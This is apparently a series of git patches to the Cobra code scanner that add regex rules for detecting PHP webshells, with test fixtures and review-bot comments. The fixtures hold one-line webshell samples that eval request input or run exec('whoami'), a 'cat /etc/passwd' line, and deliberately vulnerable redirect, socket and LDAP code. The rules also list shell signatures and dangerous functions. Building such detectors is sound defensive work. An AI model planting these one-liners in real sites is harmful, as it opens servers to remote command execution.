@@ -3,7 +3,7 @@ <name value="webshell4"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - (preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))) + (preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))) ]]></match> <level value="7"/> <test> diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360012.xml b/rules/CVI-360012.xml index 2ec1505f..bb08c944 100644 --- a/rules/CVI-360012.xml +++ b/rules/CVI-360012.xml @@ -3,8 +3,8 @@ <name value="webshell12"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;(\n)*[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}) - ]]></match> + \$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}) +]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[$newfunc = create_function('str','return str');$newfunc("$_POST['c']");]]></case> 
diff --git a/rules/CVI-360013.xml b/rules/CVI-360013.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360014.xml b/rules/CVI-360014.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360016.xml b/rules/CVI-360016.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360017.xml b/rules/CVI-360017.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360018.xml b/rules/CVI-360018.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360019.xml b/rules/CVI-360019.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360020.xml b/rules/CVI-360020.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360021.xml b/rules/CVI-360021.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360024.xml b/rules/CVI-360024.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360025.xml b/rules/CVI-360025.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml new file mode 100644 index 00000000..e69de29b 
diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index 4b4ecbd0..db6f822e 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml @@ -1,6 +1,6 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell12"/> + <name value="webshell32"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ \$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C" diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index bb815d31..5b136bd9 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -1,6 +1,6 @@ - + |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD diff --git a/rules/CVI-360034.xml b/rules/CVI-360034.xml new file mode 100644 index 00000000..73732db8 --- /dev/null +++ b/rules/CVI-360034.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell12"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*\) + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360035.xml b/rules/CVI-360035.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360038.xml b/rules/CVI-360038.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360039.xml b/rules/CVI-360039.xml new file mode 100644 index 00000000..e69de29b 
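Review bot: CVI-360034 is named `webshell12`, the name CVI-360012 already uses and the one this same commit renames CVI-360032 away from in its hunk earlier on this page, so the collision is reintroduced here; `webshell34` follows the convention of the neighbouring rules. The `<test>` element is empty although tests/vulnerabilities/webshell.php in this commit carries a sample under `//cvi-360034 360014`, and that sample line is the same one used for CVI-360014, which suggests the two patterns overlap and will produce two findings for a single variable-function call. Either the distinction between the two rules should be stated in the `<solution>` text, or one should be folded into the other.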
diff --git a/rules/CVI-360040.xml b/rules/CVI-360040.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360041.xml b/rules/CVI-360041.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360042.xml b/rules/CVI-360042.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360043.xml b/rules/CVI-360043.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360044.xml b/rules/CVI-360044.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360045.xml b/rules/CVI-360045.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360046.xml b/rules/CVI-360046.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360047.xml b/rules/CVI-360047.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360048.xml b/rules/CVI-360048.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360049.xml b/rules/CVI-360049.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360050.xml b/rules/CVI-360050.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360051.xml b/rules/CVI-360051.xml new file mode 100644 index 00000000..e69de29b diff --git a/rules/CVI-360052.xml b/rules/CVI-360052.xml new file mode 100644 index 00000000..e69de29b diff --git a/tests/vulnerabilities/v.java b/tests/vulnerabilities/v.java index c18bf405..7c0cb144 100644 --- a/tests/vulnerabilities/v.java +++ b/tests/vulnerabilities/v.java @@ -10,12 +10,12 @@ String generateSecretToken() { } try: - # CVI-110001 + # CVI-330001 Cipher c = Cipher.getInstance("DESede/CBC/PKCS5Padding"); c.init(Cipher.ENCRYPT_MODE, k, iv); byte[] cipherText = c.doFinal(plainText); - # CVI-110002 + # CVI-330002 Cipher c = Cipher.getInstance("AES/ECB/NoPadding"); c.init(Cipher.ENCRYPT_MODE, k, iv); byte[] cipherText = c.doFinal(plainText); 
diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index f326bd01..3f77d873 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -100,3 +100,42 @@ function curl($url){ unlink($file); } + +header("Location: ".$_GET["url"]); + +$host = $_POST['host']; +$port = $_POST['port']; +function GetFile($host,$port,$link) +{ + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + if (!$fp) + { + echo "$errstr (error number $errno) \n"; + } + else + { + $out = "GET $link HTTP/1.1\r\n"; + $out .= "Host: $host\r\n"; + $out .= "Connection: Close\r\n\r\n"; + $out .= "\r\n"; + fwrite($fp, $out); + $contents=''; + while (!feof($fp)) + { + $contents.= fgets($fp, 1024); + } + fclose($fp); + return $contents; + } +} + + +$surname=$_GET['surname']; +$filter = "(sn=" . $surname . ")"; +$sr=ldap_search($ds, "o=My Company, c=US", $filter); +$info = ldap_get_entries($ds, $sr); + + +$redis = new Redis(); +$redis->connect('192.168.1.2', 6379); +$redis->auth('passwd123!#'); diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php index 45693505..c6802f03 100644 --- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php @@ -7,14 +7,17 @@ include("sss.jpg"); //cvi-360003 -echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a) +echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a); //cvi-360004 $string = 'AABBCCDDEE'; preg_replace($_POST['A'], $_POST['B'], $string); -//cvi-360005 ????? -$a = $_POST['A']; preg_replace($a, $_POST['B'], $string); + +$user =$_GET['user'];preg_replace(chr(101),exec('whoami'),"aaaa"); + +$b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'; + //cvi-360006 换行就挂 $b = $_POST['B']; preg_replace($_POST['A'], $b, $string); 
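Review bot: The added fixture line `$b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add';` is not valid PHP (a closing parenthesis with no opener), and the next hunk adds `$ newfunc = create_function('str',$fun);` and `eval(php://input);`, which are equally unparsable. That is harmless for a grep-style regex rule, but if this file is also run through the AST-based path in cobra/parser.py the parser will fail on it, so a regex fixture and a parser fixture should probably be separate files. The two lines added where the `//cvi-360005` marker was removed no longer say which rule they are meant to exercise; a `//cvi-NNNNNN` marker above each keeps the fixture traceable.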
@@ -30,12 +33,95 @@ array_filter($arr, base64_decode($e)); //cvi-360010 换行就挂 -$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); +$e = $_REQUEST['e']; +$arr = array($_POST['pass'],); +array_filter($arr, base64_decode($e)); //cvi-360011 换行就挂 -$newfunc = create_function(null,'assert($_POST[c]);');$newfunc(); +$newfunc = create_function(null,'assert($cmd);');$newfunc(); //cvi-360012 换行就挂 -$newfunc = create_function('str','return str');$newfunc("$_POST['c']"); +$newfunc = create_function('str','return str'); +$newfunc("$_POST['c']"); + +//cvi-360013 换行就挂的那种 +$fun = $_POST['fun'];$ newfunc = create_function('str',$fun); + +//cvi-360014 换行就挂的那种 +$a=$_GET['A'];$a($_GET['B']); + +//cvi-360015 +if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { + sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); +} else { + echo 'Error opening sqlite db: ' . $sqliteerror; + exit; +} + +//cvi-360016 +$string = "hello cobra"; +filter_var($string, FILTER_CALLBACK,eval($cmd)); + +//cvi-360017 换行挂 +$string = "hello cobra"; +$func=$_POST['func'];filter_var($string, FILTER_CALLBACK,$func); + +//cvi-360018??????? +$data = mb_ereg_replace("[^A-Za-z0-9\.\-]","$_POST['replacement']",$data); + + +//cvi-360019??????? +$replacement=$_POST['replacement'];$data = mb_ereg_replace("[^A-Za-z0-9\.\-]",$replacement,$data); + + +//cvi-360020 +array_walk($array,$_POST['func']); + +//cvi-360021 换行挂 +$func=$_POST['func'];array_walk($array,$func); + +//cvi-360022 +eval(file_get_contents("php://input")) + +//cvi-360023 特征值 +GIF87a<?php +BM<?php + +//cvi-360024 +$f=$c('',$d);$f(); + +//cvi-360025 +$a=str_replace($bb=$cc);$a();$bb(); +$a=str_replace("$cc=$dd","Shanghai","Hello world!");$a();$cc(); + +//cvi-360026 +ob_start("eval($cmd)"); + +//cvi-360027 +eval(php://input); + +//cvi-360028 特征值 +eval("?>". 
+cat /etc/passwd + +//cvi-360029 特征值 +$bind_pl="IyEvdXNyL2Jpbi9lbnYgcGV"; + +//cvi-360030 特征值 +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2 + +//cvi-360031 特征值 +if(file_exists($settings['STOPFILE'])){$a="hello"} + +//cvi-360032 特征值 +b374k; +c999shexit(); + +//cvi-360033 特征值 +$OOO000000=urldecode; +1MSSYowqjzlVVAwAoHHFXzQ5Lc; + +//cvi-360034 360014 +$a=$_GET['A']; $a($_GET['B']); ?> From e3b3d0876f0083b7457171ee170a59fcae49a62b Mon Sep 17 00:00:00 2001 
From: braveghz <braveghz@gmail.com> Date: Mon, 4 Sep 2017 19:07:41 +0800 Subject: [PATCH 13/29] tmp-version --- cobra/parser.py | 2 ++ rules/CVI-165001.xml | 8 ++++---- rules/CVI-250001.xml | 24 ------------------------ rules/CVI-360005.xml | 4 +--- rules/CVI-360010.xml | 21 +++++++++++++++++++++ rules/CVI-360013.xml | 21 +++++++++++++++++++++ rules/CVI-360014.xml | 21 +++++++++++++++++++++ rules/CVI-360015.xml | 21 +++++++++++++++++++++ rules/CVI-360016.xml | 21 +++++++++++++++++++++ rules/CVI-360017.xml | 21 +++++++++++++++++++++ rules/CVI-360018.xml | 21 +++++++++++++++++++++ rules/CVI-360019.xml | 21 +++++++++++++++++++++ rules/CVI-360020.xml | 21 +++++++++++++++++++++ rules/CVI-360021.xml | 21 +++++++++++++++++++++ rules/CVI-360022.xml | 21 +++++++++++++++++++++ rules/CVI-360023.xml | 21 +++++++++++++++++++++ rules/CVI-360024.xml | 21 +++++++++++++++++++++ rules/CVI-360025.xml | 21 +++++++++++++++++++++ rules/CVI-360026.xml | 21 +++++++++++++++++++++ rules/CVI-360027.xml | 21 +++++++++++++++++++++ rules/CVI-360028.xml | 21 +++++++++++++++++++++ rules/CVI-360029.xml | 20 ++++++++++++++++++++ rules/CVI-360030.xml | 20 ++++++++++++++++++++ rules/CVI-360031.xml | 20 ++++++++++++++++++++ rules/CVI-360034.xml | 2 +- rules/CVI-360035.xml | 21 +++++++++++++++++++++ rules/CVI-360036.xml | 21 +++++++++++++++++++++ rules/CVI-360037.xml | 21 +++++++++++++++++++++ rules/CVI-360038.xml | 21 +++++++++++++++++++++ rules/CVI-360039.xml | 21 +++++++++++++++++++++ rules/CVI-360040.xml | 21 +++++++++++++++++++++ rules/CVI-360041.xml | 21 +++++++++++++++++++++ rules/CVI-360042.xml | 21 +++++++++++++++++++++ rules/CVI-360043.xml | 21 +++++++++++++++++++++ rules/CVI-360044.xml | 21 +++++++++++++++++++++ rules/CVI-360045.xml | 21 +++++++++++++++++++++ rules/CVI-360046.xml | 21 +++++++++++++++++++++ rules/CVI-360047.xml | 21 +++++++++++++++++++++ rules/CVI-360048.xml | 21 +++++++++++++++++++++ rules/CVI-360049.xml | 21 +++++++++++++++++++++ rules/CVI-360050.xml | 21 
+++++++++++++++++++++ rules/CVI-360051.xml | 21 +++++++++++++++++++++ rules/CVI-360052.xml | 21 +++++++++++++++++++++ 43 files changed, 803 insertions(+), 32 deletions(-) delete mode 100644 rules/CVI-250001.xml diff --git a/cobra/parser.py b/cobra/parser.py index 67b9e9f3..c72d11a8 100644 --- a/cobra/parser.py +++ b/cobra/parser.py @@ -664,5 +664,7 @@ def scan_parser(code_content, sensitive_func, vul_lineno): analysis(all_nodes, func, back_node, int(vul_lineno), flag=0, function_params=None) except SyntaxError as e: logger.debug(e) + except Exception as e: + logger.debug(e) return scan_results diff --git a/rules/CVI-165001.xml b/rules/CVI-165001.xml index 70cfa449..6b8b4512 100644 --- a/rules/CVI-165001.xml +++ b/rules/CVI-165001.xml @@ -7,10 +7,10 @@ <level value="5"/> <test> <case assert="true"><![CDATA[ - $surname=$_GET['surname']; - $filter = "(sn=" . $surname . ")"; - $sr=ldap_search($ds, "o=My Company, c=US", $filter); - $info = ldap_get_entries($ds, $sr); + $surname=$_GET['surname']; + $filter = "(sn=" . $surname . ")"; + $sr=ldap_search($ds, "o=My Company, c=US", $filter); + $info = ldap_get_entries($ds, $sr); ]]></case> </test> <solution> diff --git a/rules/CVI-250001.xml b/rules/CVI-250001.xml deleted file mode 100644 index 73530215..00000000 --- a/rules/CVI-250001.xml +++ /dev/null @@ -1,24 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="LDAP注入"/> - <language value="php"/> - <match mode="function-param-controllable"><![CDATA[ldap_(add|delete|list|read|search|bind)]]></match> - <repair block="in-function-up"><![CDATA[ldap_escape\s*\(\s*.+?\s*,\s*.+?\s*,\s*LDAP_ESCAPE_FILTER\s*\)]]></repair> - <level value="5"/> - <test> - </test> - <solution> - ## 安全风险 - - LDAP Injection - 允许进行LDAP查询 + 输入未进行过滤 ---> LDAP注入 - 这种威胁可以让攻击者能够从LADP树中提取到很多很重要的信息 - - ## 修复方案 - 对用户输入数据中包含的”语言本身的保留字符”进行转义 - - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> - 
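Review bot: The new `except Exception as e: logger.debug(e)` in `scan_parser` swallows every failure of the AST analysis at debug level, so a parser crash now silently yields an empty `scan_results` and the finding is dropped with no visible trace; for a security scanner that is a false negative, not a benign skip. Logging at warning level with context, `logger.warning('scan_parser failed at line %s: %s', vul_lineno, e)`, or `logger.exception(...)` so the traceback is kept, makes the failure noticeable, and narrowing the clause to the exception types `analysis` actually raises would be better still. `scan_parser` begins outside the hunk, so I cannot see whether the caller treats an empty result as "no vulnerability".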
diff --git a/rules/CVI-360005.xml b/rules/CVI-360005.xml index 86cfbbe3..45ef2e8e 100644 --- a/rules/CVI-360005.xml +++ b/rules/CVI-360005.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell5"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)]]></match> <level value="7"/> <test> </test> diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml index e69de29b..6bbfb48a 100644 --- a/rules/CVI-360010.xml +++ b/rules/CVI-360010.xml 
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell10"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e));]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360013.xml b/rules/CVI-360013.xml index e69de29b..a8c0f7e6 100644 --- a/rules/CVI-360013.xml +++ b/rules/CVI-360013.xml 
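Review bot: The pattern in this rule starts with the newline and indentation inside `<![CDATA[`, whereas the same commit flattens CVI-360005 onto one line; if the rule loader does not strip CDATA whitespace (the loader is not visible here), the regex begins with a literal newline and spaces and the single-line test case `$e = $_REQUEST['e'];...` cannot match it. Either flatten this CDATA the same way, `<match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*...]]></match>`, or confirm that whitespace is stripped and say so in the rule. Every other rule added in this commit uses the indented layout, so whichever it is should be applied consistently.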
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell13"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360014.xml b/rules/CVI-360014.xml index e69de29b..fa367b59 100644 --- a/rules/CVI-360014.xml +++ b/rules/CVI-360014.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell14"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml index e69de29b..44633e23 100644 --- a/rules/CVI-360015.xml +++ b/rules/CVI-360015.xml 
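Review bot: `<case assert="true"><![CDATA[]]></case>` asserts that the empty string matches the create_function pattern, which either fails or is skipped by the harness; either way the rule ships without a single positive sample, and the same empty case is copied into most of the rules added here. A minimal sample the regex does match is `<case assert="true"><![CDATA[$f=$_POST['f'];create_function('',$f);]]></case>`; a negative case (`assert="false"`) with a constant body would also guard the `['\"]\s*.{0,100}(eval|...)` branch against benign code.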
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell15"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\( + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360016.xml b/rules/CVI-360016.xml index e69de29b..c6908308 100644 --- a/rules/CVI-360016.xml +++ b/rules/CVI-360016.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell16"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360017.xml b/rules/CVI-360017.xml index e69de29b..4b6e320d 100644 --- a/rules/CVI-360017.xml +++ b/rules/CVI-360017.xml 
